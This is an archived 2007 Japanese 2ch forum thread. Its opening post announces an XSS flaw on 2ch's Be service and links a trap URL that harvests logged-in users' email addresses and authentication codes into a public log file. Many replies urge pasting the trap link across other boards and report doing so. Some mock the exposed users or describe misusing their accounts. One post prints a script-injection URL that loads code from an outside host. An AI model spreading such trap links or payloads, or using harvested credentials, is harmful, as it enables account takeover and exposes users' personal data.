2007年11月28日

【速報】俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見

1：スレ立て代行＠大学中退(兵庫県) 2007/11/27(火) 23:22:25 ID:EbtVATOs0●
俺こと脱帽は、先日のいつか忘れたけど2chにXSSの脆弱性を発見した。
今回は通常のウェブブラウザ（除く専ブラ）からBeにログインした状態で任意のURLにアクセスするとBeのメアドと認証コードが漏れる脆弱性であり、それによってアカウント乗っ取りやプロフィールの変更が可能になってしまう。
このスレッドのアドレスは色々と危険です。踏むときは自己責任で

現時点で数箇所のCGIで同脆弱性を確認しているが、この限りではない可能性もある。サンプルURLを貼って置くが絶対に悪用しないよう注意を促したい。

http://z.la/ms0k2 (短縮URL、罠なので踏む時は注意)
http://moyashi.sosite.jp/xss/log.txt (盗まれた情報が記録されるファイル)

▼ 汎用XSS記録装置
http://moyashi.sosite.jp/xss/
▼ 俺公式サイト
http://manabi.homeunix.net/

7 名前：オカマ(広島県)[] 投稿日：2007/11/27(火) 23:23:21 ID:p57KDre90: 運営に行け
8 名前：プロガー(東京都)[] 投稿日：2007/11/27(火) 23:23:35 ID:Ugo4g8VU0: ＞今回は通常のウェブブラウザ（除く専ブラ）からBeにログインした状態で
しねーよ
10 名前：船長(関西地方)[sage] 投稿日：2007/11/27(火) 23:24:16 ID:7lt5rKzZ0: mata
omae ka

IDでIPわかるスレでも立てとけ
16 名前：噺家(三重県)[sage] 投稿日：2007/11/27(火) 23:25:30 ID:k9vNAePH0: >>10
あれ毎回立ててるの俺じゃないんだよな
11 名前：自衛官(兵庫県)[sage] 投稿日：2007/11/27(火) 23:24:31 ID:lkJp1kPA0: ２ちゃんブラウザからしかログインしないから平気だ。
しかもさくられてスレ立てられなくなったし。
BEログイン、ログアウトをマウスジェスチャで割り当てとけばかなり便利。
21 名前：カラオケ店勤務(関西地方)[] 投稿日：2007/11/27(火) 23:28:02 ID:Z6W8igZE0: ここが新しいクレクレスレか
23 名前：漢(長屋)[] 投稿日：2007/11/27(火) 23:28:11 ID:fXBByzWF0 ?2BP(100): とりあえず↓をあちこちにコピペすりゃいいのか
http://z.la/ms0k2
25 名前：ロマンチック(埼玉県)[] 投稿日：2007/11/27(火) 23:28:48 ID:J1LQtajf0: >>1
マジだなんかオマンチンみたいだなw
29 名前：外資系会社勤務(東京都)[] 投稿日：2007/11/27(火) 23:30:46 ID:rBd/KVfm0: これは悪用すると余裕で逮捕されそう
31 名前：海賊(愛知県)[] 投稿日：2007/11/27(火) 23:30:57 ID:Z8wFfLea0: 入力された mail address =
入力された認証コード =

この BE を公開BEとして登録します。

already exist ? (127.0.0.0)

すでに登録済みです。(2)　←　これが出るといまいち

FOX ★
33 名前：銭湯経営(愛知県)[] 投稿日：2007/11/27(火) 23:31:55 ID:aKSRj2gh0 ?PLT(13210): test
35 名前：男性巡査(関西地方)[sage] 投稿日：2007/11/27(火) 23:32:15 ID:MyJgY4+t0 ?S★(713689): これはひどい
39 名前：守銭奴(福岡県)[] 投稿日：2007/11/27(火) 23:33:39 ID:AFLE2iOj0 ?PLT(12122): >>32
42 名前：美容部員(東京都)[sage] 投稿日：2007/11/27(火) 23:35:43 ID:bQ5mQjx9P ?2BP(3209): OperaからP2使ってる俺涙目ｗ　orz
43 名前：海賊(愛知県)[] 投稿日：2007/11/27(火) 23:35:55 ID:Z8wFfLea0: くるまやＭＡＸ
http://nobita.blog.shinobi.jp/

ここのブログの主が引っかかってしまったようだな
44 名前：男性巡査(関西地方)[sage] 投稿日：2007/11/27(火) 23:36:17 ID:MyJgY4+t0 ?S★(713689): てか、Beに金使ってる人いるんだからその脆弱性悪用してクッキー抜いてしかもそれを公開するのはどうかと思う
45 名前：船長(関西地方)[sage] 投稿日：2007/11/27(火) 23:36:44 ID:7lt5rKzZ0: >>44
あ？
46 名前：ふぐ調理師(神奈川県)[sage] 投稿日：2007/11/27(火) 23:37:08 ID:aW5+J7Q10: >>44
さっさとsakuられろ
56 名前：張出横綱(愛知県)[] 投稿日：2007/11/27(火) 23:39:15 ID:Xfnl9wZi0 ?2BP(0): >>44
Beには１円も使ってないですよぉ＾＾
58 名前：守銭奴(福岡県)[] 投稿日：2007/11/27(火) 23:40:00 ID:AFLE2iOj0 ?PLT(12122): >>44
カネ出す奴はアホだろ
188 名前：訪問販売(埼玉県)[sage] 投稿日：2007/11/28(水) 00:02:34 ID:PcIRoJjH0 ?BRZ(10002): >>44
お前が言うなばか
47 名前：栄養士(神奈川県)[] 投稿日：2007/11/27(火) 23:37:27 ID:cULK1D5R0: 脱帽ひさしぶりｗ
またクソプログラム公開しないのか？
48 名前：カラオケ店勤務(東日本)[] 投稿日：2007/11/27(火) 23:37:49 ID:QVsW884y0: 脆弱性を放置しているのも問題だと思う
49 名前：党首(コネチカット州)[] 投稿日：2007/11/27(火) 23:38:13 ID:F8PliWCVO: このスレタイだから三重県の奴と思ったけど違った
53 名前：スレスト(北海道)[sage] 投稿日：2007/11/27(火) 23:38:27 ID:fbIzPoKK0 ?DIA(300004): tes
67 名前：氷殺ジェット(中部地方)[sage] 投稿日：2007/11/27(火) 23:42:10 ID:AnoZqxlK0: >>53
（´・ω・）ｶﾜｲｿｽ
97 名前：巡査(愛知県)[] 投稿日：2007/11/27(火) 23:48:13 ID:2EA4YqD60: >>53
わろたｗ
57 名前：理系(神奈川県)[] 投稿日：2007/11/27(火) 23:39:39 ID:4k4W56KH0 ?PLT(14738): らめぇ・・
60 名前：但馬牛(茨城県)[] 投稿日：2007/11/27(火) 23:40:18 ID:Ll3VTxu10: 脱帽ってあの脱帽か
つーと昔に見た記憶しかない
61 名前：留学生(関東地方)[] 投稿日：2007/11/27(火) 23:40:19 ID:Ka2d895H0: log.txtに情報がどんどん蓄積している件
62 名前：扇子(北海道)[図書館] 投稿日：2007/11/27(火) 23:41:19 ID:wT1cffrP0 ?2BP(2316): 専ブラなら問題ないんでしょ？
63 名前：日本語教師(アラバマ州)[] 投稿日：2007/11/27(火) 23:41:25 ID:agJN/CUE0: よくわからんがこれって２ちゃんの脆弱性なの？？？
クッキーのせいじゃなくて？
64 名前：栄養士(神奈川県)[] 投稿日：2007/11/27(火) 23:41:41 ID:cULK1D5R0: txtみたけど、どこにメアドと認証コードが書いてあるんだ？
意味わからん
83 名前：ロマンチック(埼玉県)[] 投稿日：2007/11/27(火) 23:44:46 ID:J1LQtajf0: >>64
@で検索してみ
66 名前：船長(関西地方)[sage] 投稿日：2007/11/27(火) 23:42:05 ID:7lt5rKzZ0: 大量やな
プロバのアドとかで登録してる馬鹿もいるんだな
118 名前：軍事評論家(アラバマ州)[sage] 投稿日：2007/11/27(火) 23:53:32 ID:tLazyMqc0: >>66
フリーアドレス系で全く登録できなかったからプロバにしてしもた
69 名前：経済評論家(兵庫県)[] 投稿日：2007/11/27(火) 23:42:35 ID:xIRNcmHN0 ?2BP(6000): 共有beが久しく公開されてない。そろそろ誰かやれよ
72 名前：張出横綱(東京都)[] 投稿日：2007/11/27(火) 23:43:03 ID:7sQz/8yW0: >>69
ハメ太ならニーピンで見たぞ
70 名前：守銭奴(福岡県)[] 投稿日：2007/11/27(火) 23:42:42 ID:AFLE2iOj0 ?PLT(12122): なんかトロイ入ってねーか？avastたんに怒られたぞ
71 名前：留学生(福岡県)[] 投稿日：2007/11/27(火) 23:42:52 ID:6jQ9irgR0: よく分からんから
片っ端からログインして俺のBEにｃｈ森全部移した
76 名前：留学生(埼玉県)[] 投稿日：2007/11/27(火) 23:43:21 ID:Ef46raAQ0: >>71
あーあ
77 名前：留学生(千葉県)[sage] 投稿日：2007/11/27(火) 23:43:32 ID:yjbKHpNG0: >>71
どうやってBeをモリに移行させるんだ？詳しく
79 名前：留学生(福岡県)[] 投稿日：2007/11/27(火) 23:44:00 ID:6jQ9irgR0: >>77
いや、ポイントとして俺のBEに送ったってこと
84 名前：美容部員(東京都)[sage] 投稿日：2007/11/27(火) 23:44:57 ID:bQ5mQjx9P: >>79
全員にお前のアカウントばれるじゃん
82 名前：扇子(北海道)[図書館] 投稿日：2007/11/27(火) 23:44:32 ID:wT1cffrP0 ?2BP(2316): >>71
本当かどうか俺をＰＬＴにして証明してみろ
73 名前：大学中退(香川県)[] 投稿日：2007/11/27(火) 23:43:08 ID:6UBCNbiq0: Firefox使ってる奴は
http://moyashi.sosite.jp/xss/load.js
をAdblockに追加しておくといいかもしれんね

ともかくこういうのは大っぴらに公開する前に管理者にメール出すでしょ？
脱帽って頭悪いの？
81 名前：噺家(三重県)[sage] 投稿日：2007/11/27(火) 23:44:19 ID:k9vNAePH0: >>73
鱈子にはメールしたよ
78 名前：理系(岡山県)[] 投稿日：2007/11/27(火) 23:43:40 ID:vcxeffrr0: Be焼かれたｗ
88 名前：ひよこ(北海道)[] 投稿日：2007/11/27(火) 23:45:37 ID:0MHlCR7E0: http://b.2ch.net/
焼かせてもらいます＾＾
91 名前：扇子(北海道)[図書館] 投稿日：2007/11/27(火) 23:46:56 ID:wT1cffrP0 ?2BP(2316): 糞スレ立てたくてもＰＬＴじゃないと立てられないのだよ
92 名前：理系(岡山県)[] 投稿日：2007/11/27(火) 23:47:11 ID:vcxeffrr0: Be焼かれた(´･ω･`)
100 名前：留学生(福岡県)[] 投稿日：2007/11/27(火) 23:49:06 ID:6jQ9irgR0: >>92
p6208-ipbfp403okayamaima.okayama.ocn.ne.jp

この人？
メール10000通送る
95 名前：通訳(福島県)[] 投稿日：2007/11/27(火) 23:47:26 ID:3Qj/WMrD0 ?PLT(12010): これはセキュリティが悪いべ。
そもそもURL踏んだだけで、検索したから50森没収なとか
ふざけたシステムだったし、ブラジルは。
96 名前：銭湯経営(愛知県)[] 投稿日：2007/11/27(火) 23:48:09 ID:aKSRj2gh0: 物凄い勢いで焼けてるぞー
98 名前：彼女居ない暦(埼玉県)[] 投稿日：2007/11/27(火) 23:48:16 ID:t8mN2Kpd0: 誰がVIPで釣ってこいよ
俺はビビリだからやらないけど
104 名前：会社員(東京都)[] 投稿日：2007/11/27(火) 23:49:58 ID:ivmQ72KZ0: kakiko.comのソースチェッカーのURLもログにひっかかってるｗ
あれ使って見てもクッキー抜かれるのかよ
やっぱりブラクラチェッカーで見ないとだめだな
105 名前：空軍(神奈川県)[] 投稿日：2007/11/27(火) 23:50:31 ID:Izf3j1lj0 ?2BP(201): あーMDMDって奴か
かちゅで使う奴だな
106 名前：理系(岡山県)[sage] 投稿日：2007/11/27(火) 23:50:47 ID:vcxeffrr0: 最悪だ
107 名前：中小企業診断士(アラバマ州)[] 投稿日：2007/11/27(火) 23:51:08 ID:cQTV/B5c0: よく分からんが面白いことになりそう？
俺はBe使ってないから問題ないし
祭りになったら教えてくれ
110 名前：扇子(北海道)[図書館] 投稿日：2007/11/27(火) 23:51:58 ID:wT1cffrP0 ?2BP(2316): 24 名前：理系(岡山県)[] 投稿日：2007/11/27(火) 23:28:39 ID:vcxeffrr0 ?PLT(12000)
焼き払えー

68 名前：理系(岡山県)[] 投稿日：2007/11/27(火) 23:42:21 ID:vcxeffrr0
てす

78 名前：理系(岡山県)[] 投稿日：2007/11/27(火) 23:43:40 ID:vcxeffrr0
Be焼かれたｗ

92 名前：理系(岡山県)[] 投稿日：2007/11/27(火) 23:47:11 ID:vcxeffrr0
Be焼かれた(´･ω･`)

106 名前：理系(岡山県)[sage] 投稿日：2007/11/27(火) 23:50:47 ID:vcxeffrr0
最悪だ
114 名前：カラオケ店勤務(東日本)[] 投稿日：2007/11/27(火) 23:52:26 ID:QVsW884y0: これクッキーに大量のデータ設定してリンク踏みまくったら
log.txt がスゴイサイズになったりしないのかなｗ
127 名前：噺家(三重県)[sage] 投稿日：2007/11/27(火) 23:55:35 ID:k9vNAePH0: >>114
簡易的なDoS対策はしてあります
http://moyashi.sosite.jp/xss/
138 名前：カラオケ店勤務(東日本)[] 投稿日：2007/11/27(火) 23:57:06 ID:QVsW884y0: >>127
抜け目無いなｗ
196 名前：カラオケ店勤務(愛知県)[] 投稿日：2007/11/28(水) 00:04:50 ID:QY72gd440: >>127
これが作者？三重？
115 名前：養豚業(鹿児島県)[] 投稿日：2007/11/27(火) 23:52:44 ID:doa8HRe90: cocoaとか言う奴涙目って事か
117 名前：ほうとう屋(東京都)[] 投稿日：2007/11/27(火) 23:53:13 ID:PzBbjd6X0 ?PLT(12022): これは不正アクセスになるのかな？
ポイント・モリタポの移動は危険っぽいぞ！
123 名前：大学中退(香川県)[] 投稿日：2007/11/27(火) 23:54:29 ID:6UBCNbiq0: >>117
ばりばり不正アクセスになるんじゃないかな？
上のほうでポイント抜いてた福岡涙目

http://be.2ch.net/test/logout.html
専ブラ以外でBe使ってる奴はログアウトしておいたほうがよさげ
132 名前：留学生(福岡県)[] 投稿日：2007/11/27(火) 23:56:19 ID:6jQ9irgR0: >>123
嘘に決まってんじゃん（笑
そりゃログインしたら不正アクセスだね完全に
164 名前：プレアイドル(関西地方)[] 投稿日：2007/11/27(火) 23:59:15 ID:8hHUTwcx0: >>123
ログアウトじゃ意味ねーよ馬鹿

このクッキー削除してこい
182 名前：ほっちゃん(香川県)[] 投稿日：2007/11/28(水) 00:02:08 ID:LuLMWK9z0: >>164
ログアウトすればCookie消えたよ？
まぁ俺はuserChrome.jsでアカウント切り替える奴作ってるからどうでもいいけれども
128 名前：空軍(神奈川県)[] 投稿日：2007/11/27(火) 23:55:52 ID:Izf3j1lj0 ?2BP(201): おいおまいらもっと一杯BE持ち居そうな所にhttp://z.la/ms0k2
このURL貼りまくって来いｗｗｗｗ

俺たちの総力で祭り起こそうぜｗｗｗｗｗうｌうぇｗｗｗｗｗｗｗｗｗｗ
171 名前：ゆうこりん(東京都)[] 投稿日：2007/11/28(水) 00:00:13 ID:E+5quWH80: >>128
★★★　ニュース速報株主総会　2007年11月27日　★★★
http://news23.2ch.net/test/read.cgi/news/1196164916
130 名前：銭湯経営(愛知県)[] 投稿日：2007/11/27(火) 23:56:02 ID:aKSRj2gh0: お、対策に乗り出したか
131 名前：忍者(山口県)[sage] 投稿日：2007/11/27(火) 23:56:15 ID:pwYaf2ea0: be板に張ったらパニックになりそうだなｗ
144 名前：ロマンチック(埼玉県)[] 投稿日：2007/11/27(火) 23:57:48 ID:J1LQtajf0: >>131
駄目だらかな！絶対だからな！
142 名前：軍事評論家(アラバマ州)[sage] 投稿日：2007/11/27(火) 23:57:22 ID:tLazyMqc0: よくわからんけどbeログインしたまま>>1のアドレス踏んだらアウトってことだね？
株ガチャしたいから常にログインしっぱなしだよ・・・
158 名前：( ○ ´ ー｀ ○ ) はスバラシイ[] 投稿日：2007/11/27(火) 23:58:17 ID:3Qj/WMrD0 ?PLT(12010): >142
短縮URL踏まされるかもだし、ガチャするときだけログインするようにしたほうがよいんじゃ
163 名前：軍事評論家(アラバマ州)[sage] 投稿日：2007/11/27(火) 23:59:14 ID:tLazyMqc0: >>158
アドレスも変えられるのか・・・
こまめにログアウトするようにするよ
サンクス
143 名前：巡査(愛知県)[] 投稿日：2007/11/27(火) 23:57:35 ID:2EA4YqD60: ちょっとBE板いってはりまくってくるｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
147 名前：船員(北海道)[] 投稿日：2007/11/27(火) 23:57:50 ID:g4YOEVWi0 ?PLT(12001): N速忍法「ぁゃιぃURLは踏まないの術」と
「レスしてる奴の反応を見て踏むかどうか決めるの術」を極めた俺には
この程度の罠、なんとも無いぜ
149 名前：女工(東京都)[] 投稿日：2007/11/27(火) 23:57:57 ID:lDuRefJz0: http://z.la/ms0k2

とりあえず、このＵＲＬをそこらじゅうにばら撒いとけばいいわけ？
153 名前：会社員(大阪府)[] 投稿日：2007/11/27(火) 23:58:04 ID:xki37eRf0: お前ら辞めろよ、頑張ったらモリタポが貰えるスレとかに貼り付けるのは辞めろよ
156 名前：留学生(愛知県)[] 投稿日：2007/11/27(火) 23:58:05 ID:1nSEWezQ0: エンジン全壊が作ったの？
たしか>>1のサイトのやつはプログラミングが糞下手で
へんなものをつくって自分で宣伝してたからロックしてやった記憶があるｗ
193 名前：エンジン全壊 ◆BrEAKNeQmw [] 投稿日：2007/11/28(水) 00:04:22 ID:Y+B+Kcn80 ?2BP(2350): >>156
俺作ってないよ＞＜
スレ立ててって頼まれたです。

>>180
実況ろだリングを追い出された。
もう一回まっさらにしてやり直すつもり。

ttp://www.any-disease-or-malfunction-of-the-autonomic-nervous-system.be/jlab-k66/
204 名前：ダンサー(大阪府)[sage] 投稿日：2007/11/28(水) 00:06:30 ID:cqDDQh+h0: >>193
ソース公開してなかったっけ？
zipが消えてたのしか見れなかったんだけど
217 名前：エンジン全壊 ◆BrEAKNeQmw [] 投稿日：2007/11/28(水) 00:08:52 ID:Y+B+Kcn80 ?2BP(2350): >>204
ZIPのアップローダも俺じゃないです＞＜
225 名前：ダンサー(大阪府)[sage] 投稿日：2007/11/28(水) 00:10:06 ID:cqDDQh+h0: >>217
じゃあ誰だよ
239 名前：エンジン全壊 ◆BrEAKNeQmw [] 投稿日：2007/11/28(水) 00:11:01 ID:Y+B+Kcn80 ?2BP(2350): >>225
脱帽さん
262 名前：ダンサー(大阪府)[sage] 投稿日：2007/11/28(水) 00:14:19 ID:cqDDQh+h0: >>239
あ？
脱帽のページって>>1のＵＲＬでしょ？
なに共有垢？
165 名前：留学生(関東地方)[] 投稿日：2007/11/27(火) 23:59:21 ID:Ka2d895H0: だから専ブラ使えよカス共
つうか個人情報を本人の承諾なく開示してる>>1は逮捕なんじゃねーの
176 名前：図書係り(アラバマ州)[] 投稿日：2007/11/28(水) 00:00:59 ID:WpTOVGOj0: >>165
専ブラ使ってるけど
ブラウザじゃないとモリタポのページとか
2証とか見れないじゃん
185 名前：職業訓練指導員(関東地方)[] 投稿日：2007/11/28(水) 00:02:16 ID:7pKshj3p0: >>176
必要な時だけブラウザ使えよ
横着すると痛い目見るぞ
191 名前：図書係り(アラバマ州)[] 投稿日：2007/11/28(水) 00:03:38 ID:WpTOVGOj0: >>185
意味がわからない
必要な時だけブラウザ使ってるけれども・・・

ログインログアウトは横着してるけどねｗ
166 名前：留学生(福岡県)[] 投稿日：2007/11/27(火) 23:59:26 ID:6jQ9irgR0: BE板の勢いある順に貼ってくる
168 名前：年金未納者(兵庫県)[] 投稿日：2007/11/27(火) 23:59:34 ID:TOP3pVHk0: いや、ちょっとまてよ
認証パスだけじゃ書き込みは出来るけどモリタポ移行とかは出来ないだろ
175 名前：美人秘書(神奈川県)[] 投稿日：2007/11/28(水) 00:00:51 ID:Vp89YsYg0: >>168
モリタポ送付できる
181 名前：電話番(北海道)[] 投稿日：2007/11/28(水) 00:01:53 ID:9+V/3hbH0: >>168
認証コードとメアドあれば俺でもクッキー作れるよ
186 名前：ひき肉(兵庫県)[] 投稿日：2007/11/28(水) 00:02:28 ID:pMHQaW4a0: >>181
なんだ出来るのか
俺には出来ないからお前らやっといてくれ
180 名前：ダンサー(大阪府)[sage] 投稿日：2007/11/28(水) 00:01:47 ID:cqDDQh+h0: >>1
お前まえなんか画像掲示板公開してなかったっけ？
あれちょうだいよ鳥損ねたよ
192 名前：電話番(北海道)[] 投稿日：2007/11/28(水) 00:04:12 ID:9+V/3hbH0: ちょっと、張ってきます
突然増えるかも
198 名前：歯科技工士(関西地方)[sage] 投稿日：2007/11/28(水) 00:05:09 ID:RlnZ/Drt0: >>192
まじで大量にきたし
199 名前：ひよこ(山口県)[sage] 投稿日：2007/11/28(水) 00:05:37 ID:xy0s1fpZ0: http://moyashi.sosite.jp/xss/log.txt
これリロードしたら焼かれてﾜﾛﾀ
207 名前：女性の全代表(catv?)[] 投稿日：2007/11/28(水) 00:06:33 ID:zvdO4z0A0: >>1
Be持ちの個人情報を保存させていただきました^^

http://moyashi.sosite.jp/xss/log.txt
214 名前：美容部員(関西地方)[sage] 投稿日：2007/11/28(水) 00:08:04 ID:TiB5h+rx0: そんなん公開する前に自分のところのXSSも対策しとけよ＾＾

http://manabi.homeunix.net/test/debug.pl?name=%3CSCRIPT/SRC=http%3a%2f%2fkusomiso%2ecom%2fdel%2ejs%3E%3C/SCRIPT%3E&file=&checkbox=value1&checkbox=value2&checkbox=value3
263 名前： 40歳無職(三重県)[sage] 投稿日：2007/11/28(水) 00:14:20 ID:uuFnxPaY0: >>214
manabi はあえてXSS対策していない
何もcookieやら情報を使うサービスやってないしね
274 名前：美容部員(関西地方)[sage] 投稿日：2007/11/28(水) 00:15:29 ID:TiB5h+rx0 ?S★(713689): >>263
なんという正論？（＾０＾）

これは間違いなく反論できない（＾０＾）
293 名前： F-15K(滋賀県)[sage] 投稿日：2007/11/28(水) 00:17:07 ID:DoxG0UL50: >>274
kusaiの人どこかいい転送サービス教えて
280 名前：ほっちゃん(香川県)[] 投稿日：2007/11/28(水) 00:16:11 ID:LuLMWK9z0: >>263
早く公開停止した方がいいだろ・・・
お前どうなっても知らんぞ
215 名前：宅配バイト(アラバマ州)[] 投稿日：2007/11/28(水) 00:08:10 ID:FgArTiLu0: 面白ニュースに貼った奴には粘着することにする
221 名前：会社員(長野県)[] 投稿日：2007/11/28(水) 00:09:24 ID:lAxML+To0 ?PLT(16073): 見方がよく分からん。どこからが認証コードなん？
236 名前：ミトコンドリア(アラバマ州)[] 投稿日：2007/11/28(水) 00:10:39 ID:UQyFzLdd0: >>221
MDMDじゃね？
238 名前：会社員(長野県)[] 投稿日：2007/11/28(水) 00:11:00 ID:lAxML+To0 ?PLT(16073): >>236
おお、これか。横にメアドもあるな。

どうすんのこれ？ｗ
226 名前：作家(神奈川県)[] 投稿日：2007/11/28(水) 00:10:10 ID:1/9IwK5/0: matsuoka miuってだれ？
240 名前：新聞社勤務(愛知県)[] 投稿日：2007/11/28(水) 00:11:02 ID:i6Yboq450: >>226
苺ましまろのヒロイン、松岡美羽ちゃんだろ
230 名前：カラオケ店勤務(愛知県)[] 投稿日：2007/11/28(水) 00:10:16 ID:QY72gd440: ★☆★　beつけてるやつに朗報　★☆★
http://ex23.2ch.net/test/read.cgi/campus/1196176190/1

1 名前：学生さんは名前がない[] 投稿日：2007/11/28(水) 00:09:50 株主優待
ttp://z.la/ms0k2

ここでポイントが稼げる。
２０分やれば１０００ポイントはたまる。まじ。
235 名前：接客業(福岡県)[] 投稿日：2007/11/28(水) 00:10:33 ID:icLItcja0 ?PLT(12122): ＩＥ多いんだなぁ・・・あとmac
294 名前：ダンサー(東京都)[] 投稿日：2007/11/28(水) 00:17:16 ID:47DlryOQ0: なんかheiwabokeとかひっかかってるぞｗ
316 名前：探検家(コネチカット州)[スレ立て代行始めました詳細はbeプロフ] 投稿日：2007/11/28(水) 00:19:47 ID:R/GGR2/LP ?PLT(12000): >>294
あのサイトの管理人か

俺が相互リンクしているというのに。。。
298 名前：美容部員(アラバマ州)[] 投稿日：2007/11/28(水) 00:17:30 ID:E6Lj2/UH0 ?2BP(6855): アニヲタ系メアド痛いのうｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
痛いのうｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
299 名前：牛(長屋)[] 投稿日：2007/11/28(水) 00:17:50 ID:cG1BwViu0 ?BRZ(10013): 専ブラは大丈夫なのか
よくわかんないけおぢょかった
307 名前：接客業(福岡県)[] 投稿日：2007/11/28(水) 00:18:54 ID:icLItcja0 ?PLT(12122): >>299
専ブラだけどやられた
312 名前：電話番(北海道)[] 投稿日：2007/11/28(水) 00:19:17 ID:9+V/3hbH0: 26 名前： Cooks ◆CoooooksjU [停止] 投稿日： 2007/11/28(水) 00:18:49.38 ID:MC9uzK7O0 ?DIA(202935)
うわ
ｵﾜﾀ
313 名前：人民解放軍(東京都)[] 投稿日：2007/11/28(水) 00:19:17 ID:oND7Swgk0: 専ブラから踏んだのに・・・。
314 名前：県議(岡山県)[sage] 投稿日：2007/11/28(水) 00:19:34 ID:wjcN5lK90 ?2BP(0): 専ブラで踏んだのにかかった('A`)
315 名前：五郎左衛門 ◆GOROswG6Zk [sage] 投稿日：2007/11/28(水) 00:19:39 ID:coieGqXl0 ?PLT(32000): あーらら俺知らねっと
329 名前：アマチュア無線技士(アラバマ州)[sage] 投稿日：2007/11/28(水) 00:20:37 ID:zXZ9J0N90 ?2BP(9507): 専ブラアウトなのか
NGが無難そうね
415 名前：おたく(東京都)[] 投稿日：2007/11/28(水) 00:25:55 ID:oXgfxFTA0: >>329
それだと転送されたらヤバいんじゃね？
330 名前：客室乗務員(不明なsoftbank)[sage] 投稿日：2007/11/28(水) 00:20:53 ID:e2Li0LJR0: heiwaboke@gmail

ﾜﾛﾀ
これってすぐ焼かれるのか？
346 名前：サンダーソン(アラバマ州)[sage] 投稿日：2007/11/28(水) 00:22:10 ID:JhVb8VI40: beは焼かれてるから別にいいけど
メアドを勝手にピザーラのメルマガとかに登録するんじゃえねぞｗ
352 名前：おやじ(西日本)[sage] 投稿日：2007/11/28(水) 00:22:29 ID:LYos80Uj0: Be焼かれる、ってどういうことか教えろクズども
359 名前：留学生(アラバマ州)[] 投稿日：2007/11/28(水) 00:23:12 ID:zWYWfw730: >>352
アカウント停止
353 名前：国際審判(大阪府)[] 投稿日：2007/11/28(水) 00:22:39 ID:jWPLfN5h0: ところで、焼かれたBeってどうやって判別するんだ？
363 名前：サンダーソン(アラバマ州)[sage] 投稿日：2007/11/28(水) 00:23:23 ID:JhVb8VI40: >>353
ログインして書き込んでみれば分かる
370 名前：文科相(岡山県)[] 投稿日：2007/11/28(水) 00:23:43 ID:VDwVAAZO0: ２ちゃんねるから来ました?
差出人:
不明な差出人からのメッセージです。受信許可|受信拒否
送信日時: 2007年11月28日 0:22:09
宛先:

こんばんは、メアド情報他が漏れてます(´・ω・｀)
セキュリティにご注意くださいな(＾ω＾)ノ

だれだよｗｗｗｗｗｗｗｗ
405 名前：おやじ(東京都)[sage] 投稿日：2007/11/28(水) 00:25:15 ID:GwkkKzfc0 ?2BP(3334): >>370
世の中には親切な人おるんだなぁ。
377 名前：クマ(広島県)[] 投稿日：2007/11/28(水) 00:24:12 ID:oTvZQ5F80: 専ブラから踏んだがこう出た

入力された mail address =
入力された認証コード =

この BE を公開BEとして登録します。

already exist ? (127.0.0.0)

すでに登録済みです。(2)　←　これが出るといまいち
386 名前：会社員(長野県)[] 投稿日：2007/11/28(水) 00:24:34 ID:lAxML+To0 ?PLT(16073): 狐以外に対策できそうな運営っている？まこひろじゃ無理だよな。
399 名前：ほっちゃん(香川県)[] 投稿日：2007/11/28(水) 00:25:03 ID:LuLMWK9z0: >>386
be関連はタラコの独壇場。誰も触れない。
416 名前：会社員(長野県)[] 投稿日：2007/11/28(水) 00:25:55 ID:lAxML+To0 ?PLT(16073): >>399
タラコ、こんな対策できるんかいな
421 名前：カラオケ店勤務(愛知県)[] 投稿日：2007/11/28(水) 00:26:38 ID:QY72gd440: >>416
これはクッキーに保存するとき暗号化すればおｋ
430 名前：会社員(長野県)[] 投稿日：2007/11/28(水) 00:27:15 ID:lAxML+To0 ?PLT(16073): >>421
一応連絡取る努力はしてみるか。。。
431 名前：ほっちゃん(香川県)[] 投稿日：2007/11/28(水) 00:27:18 ID:LuLMWK9z0: >>416
あーでも
これがアレなのはb.2ch.net側のXSSだから
狐しか触れんね
be崩壊＼(＾o＾)／
464 名前：会社員(長野県)[] 投稿日：2007/11/28(水) 00:29:27 ID:lAxML+To0 ?PLT(16073): >>431
じゃあもう物理的に無理だなｗ
410 名前：動物愛護団体(アラバマ州)[] 投稿日：2007/11/28(水) 00:25:31 ID:g4E1zwnP0 ?BRZ(10000): これって割れた垢がch森持ってたら勝手にアイコン買わせたり悪用できるのか？
やらないけど
429 名前：図書係り(アラバマ州)[] 投稿日：2007/11/28(水) 00:27:07 ID:WpTOVGOj0: >>410
モリタポは２ちゃん検索の垢で
別物じゃなかったっけ？
419 名前：美容部員(関西地方)[sage] 投稿日：2007/11/28(水) 00:26:27 ID:TiB5h+rx0 ?S★(713689): ログインしたら不正アクセスなんとか法に引っかかりますよー
480 名前：噺家(東京都)[sage] 投稿日：2007/11/28(水) 00:30:46 ID:BgD/tqzB0: >>419

　　お前踏んだな！
452 名前：アナウンサー(catv?)[sage] 投稿日：2007/11/28(水) 00:28:48 ID:3CO8Wd+A0: ttp://kat.cc/276ec1
焼かれた奴のHP発見ｗ
481 名前：派遣の品格(北海道)[] 投稿日：2007/11/28(水) 00:30:47 ID:Vf8iVPk00 ?PLT(12001): >>452
トップの画像に吹いた
496 名前：ゆうこりん(東京都)[] 投稿日：2007/11/28(水) 00:31:54 ID:E+5quWH80: >>452
腹いてぇｗｗｗｗｗ
498 名前：作家(埼玉県)[sage] 投稿日：2007/11/28(水) 00:32:03 ID:zcM1VCBz0: >>452
ぷぎゃーーーー
522 名前：ジャンボタニシ(アラバマ州)[] 投稿日：2007/11/28(水) 00:33:44 ID:tscCzErO0: なんかしらんが一気に引っかかるやつが増えた
>>452のせいか？
524 名前：動物愛護団体(アラバマ州)[] 投稿日：2007/11/28(水) 00:34:14 ID:g4E1zwnP0 ?DIA(134717): >>452
踏めねーよ
526 名前：週末都民(長屋)[] 投稿日：2007/11/28(水) 00:34:23 ID:pNUhIjxq0: >>452
糞ﾜﾛﾀ
530 名前：会社員(東日本)[] 投稿日：2007/11/28(水) 00:34:40 ID:acP3OpJL0 ?2BP(6012): >>452
こりゃひどいな
531 名前：ＡＶ監督(岩手県)[] 投稿日：2007/11/28(水) 00:34:46 ID:eOI8J8J90 ?2BP(8101): >>452が怖くて踏めない！
なんなのかこっそり教えてくれ！
